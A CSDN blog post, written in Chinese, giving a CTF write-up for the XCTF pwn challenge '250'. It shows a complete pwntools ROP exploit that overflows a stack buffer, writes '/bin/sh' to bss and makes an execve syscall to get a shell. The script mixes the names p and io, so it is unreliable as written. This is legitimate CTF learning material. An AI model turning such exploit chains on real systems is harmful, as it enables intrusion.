XCTF pwn 高手进阶区 250

最新推荐文章于 2021-01-13 10:38:39 发布
最新推荐文章于 2021-01-13 10:38:39 发布
阅读量1.3w 收藏 1
点赞数 1
分类专栏: pwn安全 文章标签: python shell 安全 信息安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/stareforever/article/details/112170261
版权

查看保护
在这里插入图片描述在这里插入图片描述
静态链接

IDA打开,查看程序流程
在这里插入图片描述
自定义的print函数
在这里插入图片描述
这里外面传来temp并拷贝到v3中,但是没有考虑长度,存在栈溢出漏洞,溢出长度0x3a

那么可以考虑i386的rop
在这里插入图片描述
控制对应的寄存器为对应的值就可以获得shell

程序里面没有’/bin/sh’,可以控制read函数写入到bss段

那么可以 ROPgadget --binary 250 --only “pop|ret” 查看对应的gadget
在这里插入图片描述
bss段可以选择(这里选择不唯一)
在这里插入图片描述
payload构造,首先溢出在bss段写入/bin/sh

read=elf.symbols['read']
payload = b'a'*(0x3a+0x4) 
payload += p32(read) + p32(pop_edx_ecx_ebx_ret) + p32(0) + p32(bss) + p32(0x8)

然后修改寄存器的值

payload += p32(pop_eax_ret) + p32(0xb) 
payload += p32(pop_edx_ecx_ebx_ret) + p32(0) + p32(0) + p32(bss) + p32(int_addr)

完整ex

from pwn import *
#static 构造exceve() int80 
context(log_level='debug')

io=process("./250")
elf=ELF("./250")
io.recv()
io.sendline(b'200')
io.recv()
#read=0x806d510
read=elf.symbols['read']
bss=0x080ECB00
pop_edx_ecx_ebx_ret=0x806efe0
pop_eax_ret=0x80b89e6
int_addr=0x806cbb5


payload = b'a'*(0x3a+0x4) 
payload += p32(read) + p32(pop_edx_ecx_ebx_ret) + p32(0) + p32(bss) + p32(0x8)
payload += p32(pop_eax_ret) + p32(0xb) 
payload += p32(pop_edx_ecx_ebx_ret) + p32(0) + p32(0) + p32(bss) + p32(int_addr)

p.sendline(payload)

p.send(b'/bin/sh\x00')

io.interactive()
求是量子
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
XCTF-RE】新手练习-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
XCTF PWN高手进阶之babystack
neuisf的博客
01-30 479
此题,开启了RELRO、NX、CANARY,未开启PIE,只有read函数溢出存在溢出可能。 第一,泄露canary,程序会通过puts函数输出缓冲s的内容。puts函数在输出时,只有遇到\0才会结束,而缓冲s又和main函数的canary相连,此时,输入和缓冲大小相等的字符串,溢出的\n将会覆盖canary的第一字节00,从而将canary的后三个字节输出,构建canary。 第二,获取s...
攻防世界PWN250题解
seaaseesa的博客
02-05 1054
250 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 程序存在明显的栈溢出漏洞 并且glibc被静态编译到了程序中 由于没有开启PIE,且glibc被静态编译包含,那么我们有很多方式get shell,这里,我们使用的是dl_make_stack_executable使得栈变得可执行,然后在栈里布下shellcode来getshell 为了节省步骤,我们直接...
XCTF PWN高手进阶之time_formatter
neuisf的博客
01-29 351
这是第一道堆溢出题目, 程序执行选项1时,通过strdup函数申请了一块内存保存用户输入的时间格式字符串,执行选项三时,同样 通过strdup申请了一块内存用于存放用户输入的时字符串,执行选项五时,首先释放这两块内存,然后,询问是否真的退出,此时,用户选择不退出时,程序继续回到开始执行。而此时,前两块申请的内存已被释放,未将指针置为NULL。造成UAF漏洞。 由于选项一读取用户输入内容时,会过滤...
攻防世界(pwn)250
PLpa的博客
03-23 505
前言: 此题说难也不是很难,但是需要一些基础知识,否则利用起来比较困难。 只开了NX保护的32位程序。 此题里面的功能函数几乎都是自己写的,所以说没有一点基础知识,利用起来还是挺麻烦的。 我们看到里面有一个自己写的print函数 我们点进去发现,由于size是我们自己决定的,所以里面存在一个栈溢出漏洞。 但是我们并不知道远端的libc环境版本,函数几乎自写,我们基本没什么信息可以利用,所以传...
forgot [XCTF-PWN][高手进阶]CTF writeup攻防世界题解系列13
重新启程
12-23 1042
题目地址:forgot 本题是高手进阶的第二题,恭喜大家已经进入高手行列!好假好假,哈哈哈! 废话不说,看看题目先 这个题目有很长的描述,但是都是废话,不去管他了。 照例下载附件,做下安全检查 root@mypwn:/ctf/work/python/forgot# checksec 39d012d5bbc34295855136e9662a5392 [*] '/ctf/work/py...
XCTF PWN高手进阶pwn-200
neuisf的博客
01-29 640
此题,setbuf未发现有什么作用! exp: from pwn import * sub_addr=0x8048484 def leak(addr): payload=‘a’*112+p32(write_plt)+p32(sub_addr)+p32(1)+p32(addr)+p32(4) p.sendline(payload) return p.recv()[:4] p=process("./p...
XCTF PWN高手进阶之JS
neuisf的博客
01-27 375
本题程序名为js,随便输入字符串,发现: 输入字符串会打印该字符串; 输入数字时会以科学计数法打印该数字; 输入加法算式会打印加法计算结果; 输入!1会打印false,输入!0会打印true; 输入js_fuck的命令: 提示eval函数执行时引用错误。 因此,推断程序执行是以输入为参数,调用eval运行。 于是: 输入print,打印print函数: 输入read,打印re...
XCTF-RE】新手练习-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
XCTF-RE】新手练习-insanity
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/siwtcm
BUUCTF pwn qctf_2018_dice_game
热门推荐
stareforever的博客
12-25 3万+
查看保护 程序流程 输入name后 连续猜对50次随机数即可获得flag 输入buf的可以覆盖栈上的内容,那么输入0x50个字符就可以覆盖seed,最终产生的随机数就是定值了 考虑输入0x50个‘A’,那么写c程序 可以获得生成的随机数列表 3, 3, 2, 1, 5, 3, 4, 6, 3, 4, 2, 2, 3, 2, 1, 1, 4, 5, 4, 6, 3, 6, 4, 3, 4, 2, 2, 6, 1, 2, 2, 3, 4, 1, 2, 1, 4, 5, 4, 6, 6, 5, 1, 3,
pwn题bbctf_2020_fmt_me
stareforever的博客
12-21 2万+
BUUCTF pwn题bbctf_2020_fmt_me 题目流程 snprintf 格式化漏洞 用gdb查看第一个参数的内容即可观察 参数位置在bss 0x4040a0 偏移为6 那么依据题目的意思 可以将atoi 改为system_plt; 将system_got改为main返回再次输入/bin/sh获得shell 完整ex.py ...
XCTF 攻防世界 pwn CGfsb
stareforever的博客
12-22 2万+
XCTF 攻防世界 pwn CGfsb 题目流程 printf(&s) 明显的format string 漏洞 修改pwnme的值为8 完整的ex
BUUCTF pwn 鹏城杯_2018_code
stareforever的博客
12-28 2万+
查看保护 程序流程 先输入name,然后通过对输入的字符串进行检测,通过后进入到have_fun()函数 check_str()函数要求输入的字符串ascii码在[65,90],[97,122],即字符‘A’-‘Z’和’a’-’z’; 另一个函数要求如下结果 这里可以写相应的python代码进行爆破(时间太长,可以测试查看规律) 相应的结果如下 可以发现结果是递增的,并且 那么可以猜测进行测试 确定第一个为w,后面以从类推 那么输入‘wyBTs’即可成功通过检测 进入到have_fu
BUUCTF pwn 安洵杯_2018_neko
stareforever的博客
12-23 2万+
查看保护 PIE和canary都没开 IDA打开,查看程序流程 先输入’y’或’Y’进入play函数 read存在栈溢出漏洞,cancary保护没开,可以直接溢出 溢出距离为0xd0 程序有后门 但这没有效果 那么可以先把puts函数的地址打印出来,求得libc的基地址,然后再求相应的‘/bin/sh’地址,system地址源程序有提供,第二次溢出时就可以获得shell 完整ex ...
BUUCTF pwn Runit&&RunitPlusPlus
stareforever的博客
01-13 1万+
[BSidesCF 2019]Runit 查看保护 IDA查看程序流 读入buf并执行,那么可以写入shellcode 完整ex from pwn import * context(log_level='debug') #io=process("./runit") io=remote("node3.buuoj.cn",28430) io.recv() payload=asm(shellcraft.sh()) io.send(payload) io.interactive() [BSid
BUUCTF pwn xp0intctf_2018_tutorial1
stareforever的博客
01-08 1万+
查看保护 用IDA打开查看程序流程 有后门函数backdoor,可以直接获得shell 程序逻辑很简单,输入buf使得buf==0xBABABABA即可获得shell 那么直接可以构造payload 完整ex from pwn import * context(log_level='debug') #io=process("./Xp0intCTF_2018_tutorial1") io=remote("node3.buuoj.cn",25721) io.recv() buf=0xBABABA
xctf supersqli
最新发布
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值